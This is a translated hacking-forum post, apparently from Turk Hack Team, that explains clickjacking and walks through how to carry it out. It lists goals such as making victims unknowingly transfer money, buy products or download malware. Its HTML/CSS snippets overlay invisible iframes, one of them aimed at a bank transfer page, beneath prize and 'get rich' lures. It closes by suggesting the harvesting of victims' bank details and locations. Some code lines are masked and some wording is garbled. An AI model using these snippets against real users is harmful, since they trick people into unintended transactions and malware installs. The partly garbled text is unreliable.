Hello, I want to show you what "clickjacking attack" is and how it is done. First of all, what is "Clickjacking"? Clickjacking attack is the process of feeding the screen code to the victim after clicking on a specially placed code set (for example: free download, crack download sites ... etc) while browsing a malicious page.
To give a very simple example, Facebook clickjacking is done as follows:
A visitor gets drawn to the bad page. It doesn't matter how. There is a seemingly harmless link on the page (like "get rich now" or "click here for free, download ... etc").
The bad page positions a hidden <iframe> with src from facebook.com over this link, such that the "Like" button is just above this link. This is usually done with the z-index. The visitor actually clicks the button while trying to click the link and did what we wanted on Facebook.
ClickJacking Attack Examples
The attacker creates an invisible iframe on the page and loads the tool page into it. The malicious page contains a visual element that convinces the user to click. For example, it could be a graphic element resembling a video player with a play button in the middle.The user clicks the play symbol, but because of the overlay, he clicks on a UrI item on the tool page.
The attacker creates a 1 × 1 pixel iframe that moves with the mouse cursor. Due to its size and position, this frame is completely invisible (hidden under the cursor symbol tip). If the user clicks anywhere, they click on everything that is loaded and positioned in this 1x1 frame.
The attacker uses parts of the tool sheet on the page by clipping it. For example, they create an iframe with a Submit button from the tool page.
Attacker can exploit click hacking vulnerabilities for many different purposes:
⇝Getting followers on social media and then possibly selling the social media account / page for mass marketing.
⇝Earning email or RSS subscribers for the same purpose as social media followers.
⇝Ensuring that the user is logged into the e-commerce account and purchases products on behalf of the attacker.
⇝Enabling the user to unknowingly transfer money to the attacker.
⇝To allow the user to download malware (eg a trojan, worm, backdoor..etc.)
Generally, clickjacking uses are for attack only
Some browsers allow for drag and drop to the website, making it possible to send text via Clickjacking. This means Clickjacking is now more effective than CSRF. Therefore, it is possible to exploit XSS vulnerabilities by itself or send random content as the target user - for example, adding a new admin user if the victim deceived.
For these reasons you have to be very crafty to do the attack. One click of the victim is not enough for massive attacks, sometimes it takes more than a few clicks or drag and drop within the site.
How to Do a ClickJacking Attack? Examples
Now I will show you the simple Cilick Jacking attack code I prepared. This way you will understand it better.
Kod:
*********
#protector {
height: 100%;
width: 100%;
position: absolute;
left: 0;
top: 0;
z-index: 99999999;
}
</style>
<div id="protector">
<a href="https://www.turkhackteam.org" target="_blank">Tıkla Kazan Dostum- Slyfer THT</a>
</div>
<script>
// there will be an error if top window is from the different origin
// but that's ok here
if (top.********.domain == ********.domain) {
protector.remove();
}
</script>
https://jsfiddle.net/p2heuqc0/
It's a very simple code. When clicked, it instantly redirects to the turk hack team site. To change the site, simply change href = "https://www.turkhackteam.org".
Kod:
<div style="position: absolute; left: 10px; top: 10px;">Merhaba, çok şanslısın bizden çatal bıçak takımı kazandın :) Turk Hack Team-Slyfer</div>
<div style="position: absolute; left: 200px; top: 50px;">
<img src="https://www.linkpicture.com/q/LPic5f5a31535df0f1455795954.jpg" width="250">
</div>
<div style="position: absolute; left: 10px; top: 101px; color: red; font-weight: bold;">>> Tıkla :) <<</div>
<iframe style="opacity: 0;" height="545" width="680" scrolling="no" src="http://banka hesabı veya link örnektir/Transfer.aspx"></iframe>
https://jsfiddle.net/p2heuqc0/1/
Kod:
*********
iframe { /* iframe from the victim site */
width: 400px;
height: 100px;
position: absolute;
top:0; left:-20px;
opacity: 0.5; /* in real opacity:0 */
z-index: 1;
}
</style>
<div>Click to get rich now:</div>
<!-- The url from the victim site -->
<iframe src="/clickjacking/facebook.html"></iframe>
<button>Click here!</button>
<div>TURK HACK TEAM</div>
This code is an excerpt.
Finally
Clickjacking Attack is a type of attack entirely up to your imagination and code knowledge. If you want, you can do things like clicking ads with a more legal purpose. Or, you can prepare a trap from the victim's log records, bank account username, ip address, Iocation information, browser information, as your imagination can think. This was all I had to tell. Thank you for reading.
It has been written purely for informational purposes and is not motivated in any way. I wish you good forums ..
source: https://www.turkhackteam.org/web-se...ickjacking-saldirisi-nedir-nasil-yapilir.html
çeviri/translator: Captainyarimca
Moderatör tarafında düzenlendi: